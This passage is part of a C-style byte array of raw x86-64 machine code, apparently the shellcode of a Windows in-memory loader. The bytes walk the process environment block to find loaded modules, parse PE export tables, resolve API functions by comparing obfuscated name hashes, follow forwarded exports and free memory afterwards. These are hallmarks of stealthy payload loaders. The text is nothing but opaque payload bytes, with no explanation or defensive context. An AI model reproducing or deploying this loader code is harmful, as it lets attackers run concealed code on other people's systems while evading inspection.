194 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xe0, 0x58, 0x00, 0x00, 0x48, 0x8b,
195 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
196 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03,
197 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83,
198 0xf8, 0x04, 0x75, 0x1b, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
199 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xf5, 0x24,
200 0x00, 0x00, 0xe9, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
201 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0e, 0x48, 0x8b, 0x85,
202 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x5c, 0x48,
203 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
204 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
205 0x00, 0x00, 0xe8, 0x87, 0x15, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x20, 0x48,
206 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
207 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
208 0x00, 0x00, 0xe8, 0xe8, 0x1a, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x00,
209 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
210 0xe8, 0x5d, 0x22, 0x00, 0x00, 0xeb, 0x50, 0x48, 0x8b, 0x85, 0x80, 0x01,
211 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0e, 0x48, 0x8b, 0x85,
212 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x33, 0x48,
213 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
214 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc3, 0x40, 0x00, 0x00, 0xeb, 0x1c, 0x90,
215 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90,
216 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90,
217 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
218 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74, 0x16, 0x48, 0x8b, 0x85,
219 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
220 0x03, 0x0f, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
221 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0,
222 0x74, 0x7d, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
223 0x28, 0x0d, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
224 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba,
225 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x34, 0x5a, 0x00, 0x00,
226 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
227 0x01, 0x00, 0x00, 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d,
228 0xc8, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
229 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
230 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x7e, 0x62, 0x00,
231 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x30,
232 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
233 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f,
234 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
235 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x41, 0x89, 0xc0, 0xba,
236 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8,
237 0xac, 0x59, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
238 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85,
239 0x58, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00,
240 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
241 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
242 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xbd, 0x28, 0x01,
243 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00,
244 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
245 0x48, 0x81, 0xc4, 0x10, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
246 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
247 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
248 0x60, 0x48, 0x8b, 0x4d, 0x18, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00,
249 0x00, 0x48, 0x8b, 0x55, 0x20, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
250 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
251 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x83, 0xc4, 0x30, 0x5d,
252 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x60, 0x48, 0x89, 0x4d,
253 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
254 0x28, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc,
255 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x65, 0x48, 0x8b, 0x00, 0x48,
256 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x48, 0x8b, 0x40, 0x60, 0x48,
257 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48,
258 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48,
259 0x89, 0x45, 0xf8, 0xeb, 0x45, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
260 0x30, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x3b, 0x45,
261 0x18, 0x74, 0x23, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd8, 0x41,
262 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48,
263 0x8b, 0x4d, 0x10, 0xe8, 0x76, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
264 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89,
265 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85,
266 0xc0, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xa7, 0x48, 0x83,
267 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0xc2,
268 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x3d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x45,
269 0xd0, 0x48, 0x83, 0x7d, 0xd0, 0x00, 0x74, 0x1c, 0x48, 0x8b, 0x45, 0x10,
270 0x4c, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd0,
271 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x08,
272 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
273 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x01,
274 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
275 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0x98, 0x00, 0x00, 0x00,
276 0x4c, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8d, 0xa8, 0x00,
277 0x00, 0x00, 0x48, 0xc7, 0x45, 0x78, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83,
278 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
279 0x00, 0xe9, 0xb3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00,
280 0x00, 0x48, 0x89, 0x45, 0x68, 0x48, 0x8b, 0x45, 0x68, 0x8b, 0x40, 0x3c,
281 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
282 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x05, 0x88,
283 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8b, 0x45, 0x58, 0x8b,
284 0x00, 0x89, 0x45, 0x54, 0x83, 0x7d, 0x54, 0x00, 0x75, 0x0a, 0xb8, 0x00,
285 0x00, 0x00, 0x00, 0xe9, 0x69, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x54, 0x48,
286 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45,
287 0x48, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b,
288 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x40,
289 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85,
290 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x38, 0x48,
291 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98,
292 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x30, 0x48, 0x83,
293 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00,
294 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x18, 0x89, 0x45, 0x74, 0x83, 0x7d,
295 0x74, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xeb, 0x01,
296 0x00, 0x00, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
297 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x01,
298 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00,
299 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x00,
300 0x00, 0x00, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0xc1, 0xe8, 0x62, 0x58,
301 0x00, 0x00, 0x85, 0xc0, 0x75, 0x3a, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01,
302 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x01,
303 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
304 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b, 0x00,
305 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
306 0x48, 0x89, 0x45, 0x78, 0x83, 0x6d, 0x74, 0x01, 0x83, 0x7d, 0x74, 0x00,
307 0x74, 0x3f, 0x48, 0x83, 0x7d, 0x78, 0x00, 0x0f, 0x84, 0x71, 0xff, 0xff,
308 0xff, 0xeb, 0x32, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x50, 0x10, 0x8b, 0x85,
309 0xa8, 0x00, 0x00, 0x00, 0x29, 0xd0, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
310 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b,
311 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
312 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x3b, 0x45,
313 0x48, 0x0f, 0x82, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x58, 0x8b,
314 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x48, 0x48, 0x01, 0xd0, 0x48,
315 0x39, 0x45, 0x78, 0x0f, 0x83, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
316 0x78, 0x48, 0x89, 0x45, 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00,
317 0xeb, 0x29, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0,
318 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x70, 0x88, 0x54, 0x05, 0xe0, 0x8b, 0x55,
319 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
320 0x2e, 0x74, 0x1d, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55, 0x70, 0x48, 0x8b,
321 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09,
322 0x83, 0x7d, 0x70, 0x3b, 0x76, 0xc0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x70,
323 0x83, 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x64, 0x8b, 0x45,
324 0x70, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c, 0x8b,
325 0x45, 0x70, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c,
326 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0,
327 0x00, 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x45,
328 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55,
329 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
330 0x45, 0x70, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55,
331 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
332 0xc0, 0x74, 0x06, 0x83, 0x7d, 0x70, 0x3e, 0x76, 0xd1, 0x8b, 0x45, 0x70,
333 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d, 0x4d, 0xa0, 0x48, 0x8d, 0x55,
334 0xe0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49,
335 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x90, 0x00, 0x00, 0x00,
336 0xe8, 0x0c, 0xfc, 0xff, 0xff, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45,
337 0x78, 0x48, 0x81, 0xc4, 0x00, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48,
338 0x89, 0xe5, 0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4d,
339 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00,
340 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b, 0x55,
341 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
342 0x45, 0xec, 0x88, 0x94, 0x05, 0x50, 0xff, 0xff, 0xff, 0x83, 0x45, 0xec,
343 0x01, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f,
344 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xce,
345 0x8b, 0x45, 0xec, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0x8b,
346 0x45, 0xec, 0x83, 0xe8, 0x04, 0x89, 0xc0, 0x0f, 0xb6, 0x84, 0x05, 0x50,
347 0xff, 0xff, 0xff, 0x3c, 0x2e, 0x74, 0x5f, 0x8b, 0x45, 0xec, 0x8d, 0x50,
348 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff,
349 0xff, 0x2e, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89,
350 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xec,
351 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50,
352 0xff, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55,
353 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x6c, 0x8b,
354 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84,
355 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x45, 0xa4, 0x30, 0x00, 0x00,
356 0x00, 0x8b, 0x45, 0xa4, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0x98,
357 0x48, 0x8b, 0x45, 0x98, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe0,
358 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xd8,
359 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8,
360 0xe9, 0x8b, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
361 0x30, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45,
362 0xc8, 0x48, 0x8b, 0x45, 0xc8, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48,
363 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b,
364 0x45, 0xc0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x83,
365 0x7d, 0xbc, 0x00, 0x74, 0x43, 0x8b, 0x55, 0xbc, 0x48, 0x8b, 0x45, 0xd0,
366 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b,
367 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48,
368 0x89, 0x45, 0xa8, 0x48, 0x8b, 0x55, 0xa8, 0x48, 0x8d, 0x85, 0x50, 0xff,
369 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x55, 0x00, 0x00, 0x85, 0xc0,
370 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x01,
371 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8,
372 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
373 0x0b, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff,
374 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48,
375 0x8b, 0x50, 0x30, 0x48, 0x8d, 0x85, 0x50, 0xff, 0xff, 0xff, 0x48, 0x89,
376 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0x48,
377 0x81, 0xc4, 0xd0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec,
378 0x60, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
379 0x48, 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01,
380 0x00, 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d,
381 0x08, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00,
382 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89,
383 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
384 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
385 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
386 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00,
387 0x48, 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01,
388 0x00, 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd,
389 0xb4, 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
390 0xe9, 0x76, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48,
391 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
392 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b,
393 0x40, 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01,
394 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x3c,
395 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
396 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01,
397 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8,
398 0x01, 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8,
399 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00,
400 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89,
401 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
402 0x89, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
403 0x00, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
404 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7,
405 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b,
406 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00,
407 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b,
408 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc,
409 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b,
410 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
411 0xc0, 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
412 0x60, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45,
413 0x60, 0x48, 0x89, 0xc1, 0xe8, 0x94, 0x5b, 0x00, 0x00, 0x48, 0x89, 0x85,
414 0x80, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8,
415 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
416 0x8b, 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89,
417 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
418 0x89, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00,
419 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
420 0x45, 0x5b, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
421 0x39, 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xd6, 0x01, 0x00, 0x00,
422 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
